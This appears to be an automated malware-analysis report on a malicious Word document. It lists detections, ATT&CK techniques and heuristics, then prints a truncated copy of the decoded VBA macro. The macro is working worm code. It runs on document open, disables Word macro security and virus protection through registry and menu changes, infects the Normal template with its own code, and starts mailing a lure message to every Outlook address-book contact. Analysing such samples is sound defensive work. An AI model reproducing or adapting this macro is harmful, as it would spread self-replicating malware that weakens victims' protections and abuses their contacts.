Risk Score: 328 (MALICIOUS)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros designed to execute automatically when the document is opened. The Document_Open macro attempts to modify Word's security settings and the document's summary properties, likely to weaken macro security prompts and prepare the system for further malicious activity. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' strongly suggest a trojan payload.
Heuristics (7)

- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24936 bytes |

SHA-256: bc8fa991e879976d6da61bf2ac545d38bba04746170732a6520c26df8dba2969

Detection (ClamAV): Win.Trojan.wmvg-1

Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(45) + Chr(61) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(61) + Chr(45)
.Title = Chr(66) + Chr(108) + Chr(65) + Chr(99) + Chr(75) + Chr(32) + Chr(68) + Chr(97) + Chr(89) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
.Subject = Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(105) + Chr(115) + Chr(32) + Chr(97) + Chr(32) + Chr(66) + Chr(108) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(68) + Chr(97) + Chr(121) + Chr(33)
.Comments = Chr(84) + Chr(104) + Chr(120) + Chr(32) + Chr(116) + Chr(111) + Chr(32) + Chr(67) + Chr(111) + Chr(100) + Chr(101) + Chr(98) + Chr(114) + Chr(101) + Chr(97) + Chr(107) + Chr(101) + Chr(114) + Chr(115) + Chr(46)
.Keywords = Chr(32) + Chr(124) + Chr(32) + Chr(66) + Chr(108) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(68) + Chr(97) + Chr(121) + Chr(32) + Chr(124) + Chr(32) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(32) + Chr(124) + Chr(32) + Chr(73) + Chr(116) + Chr(65) + Chr(108) + Chr(89) + Chr(32) + Chr(124) + Chr(32)
.Execute
End With
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "" Then
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
CommandBars("tools").Controls("Customize...").Enabled = False
CommandBars("view").Controls("Toolbars").Enabled = False
CommandBars("view").Controls("Status Bar").Enabled = False
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
UN92 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
MM84 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Application.EnableCancelKey = 0
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set IA14 = ActiveDocument.VBProject.VBComponents.Item(1)
BN71 = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set IA14 = NormalTemplate.VBProject.VBComponents.Item(1)
MT5 = True
End If
If MT5 = True Then
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\windows\Kernel32.sys"
IA14.CodeModule.AddFromFile ("c:\windows\Kernel32.sys")
IA14.CodeModule.deletelines 1, 4
IA14.CodeModule.replaceline 1, "Sub Document_Close()"
ElseIf BN71 = True Then
IA14.CodeModule.AddFromFile ("c:\windows\Kernel32.sys")
IA14.CodeModule.deletelines 1, 4
End If
whereits = ActiveDocument.FullName
ActiveDocument.SaveAs Environ("WINDIR") & "\free.doc"
DoEvents
ActiveDocument.SaveAs whereits
DoEvents
Set Black_OApp = CreateObject("Outlook.Application")
Set Black_Mapi = Black_OApp.GetNameSpace("MAPI")
For Each Black_AddList In Black_Mapi.AddressLists
If Black_AddList.AddressEntries.Count <> 0 Then
Black_Count = Black_AddList.AddressEntries.Count
For Black_AddListCount = 1 To Black_Count
Set Black_AddListEntry = Black_AddList.AddressEntries(Black_AddListCount)
Set Black_msg = Black_OApp.CreateItem(0)
Black_msg.To = Black_AddListEntry.Address
Black_msg.Subject = "Internet Now FREE, it's the future!!!"
Black_msg.Body = "No more money to surf, NOW it's Free..." +
```

... (truncated)